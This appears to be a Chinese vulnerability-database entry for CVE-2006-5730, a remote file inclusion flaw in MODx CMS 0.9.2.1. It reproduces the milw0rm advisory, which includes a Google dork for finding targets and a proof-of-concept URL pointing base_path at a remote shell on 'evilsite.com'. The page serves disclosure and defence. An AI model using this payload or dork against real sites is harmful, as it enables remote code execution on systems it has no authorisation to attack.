Modx CMS Thumbnail.PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111452 漏洞类型 输入验证
发布时间 2006-11-03 更新时间 2006-11-07
CVE编号 CVE-2006-5730 CNNVD-ID CNNVD-200611-070
漏洞平台 PHP CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/2706
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-070
|漏洞详情
ModxCMS的manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php中存在PHP远程文件包含漏洞,远程攻击者通过base_path参数中的URL执行任意PHP代码。
|漏洞EXP
+-------------------------------------------------------------------------------------------
+ MODx CMS 0.9.2.1 (base_path) Remote File Include Vulnerability
+-------------------------------------------------------------------------------------------
+ Affected Software .: MODx CMS 0.9.2.1
+ Vendor ............: http://modxcms.com/
+ Download ..........: http://modxcms.com/downloads.html
+ Description .......: "MODx is an open source PHP Application Framework that helps you take control of your online content."
+ Dork ..............: "powered by MODx"
+ Class .............: Remote File Inclusion
+ Risk ..............: High (Remote File Execution)
+ Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
+-------------------------------------------------------------------------------------------
+ Details:
+ MODx CMS manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php does not initialize
+ the $base_path variable before using it to include files, assuming register_globals = on,
+ we can intialize the variable in a query string and include a remote file of our choice.
+ 
+ Vulnerable Code:
+ manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php, line(s) 24:
+ -> include $base_path."manager/media/browser/mcpuk/connectors/php/Commands/helpers/iconlookup.php";
+
+ Proof Of Concept:
+ http://[target]/[path]/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://evilsite.com/shell.php?
+-------------------------------------------------------------------------------------------

# milw0rm.com [2006-11-03]
|参考资料

来源:XF
名称:modx-thumbnail-file-include(29989)
链接:http://xforce.iss.net/xforce/xfdb/29989
来源:BID
名称:20898
链接:http://www.securityfocus.com/bid/20898
来源:MILW0RM
名称:2706
链接:http://www.milw0rm.com/exploits/2706
来源:OSVDB
名称:30186
链接:http://www.osvdb.org/30186
来源:VUPEN
名称:ADV-2006-4346
链接:http://www.frsirt.com/english/advisories/2006/4346
来源:SECUNIA
名称:22675
链接:http://secunia.com/advisories/22675
来源:MILW0RM
名称:2706
链接:http://milw0rm.com/exploits/2706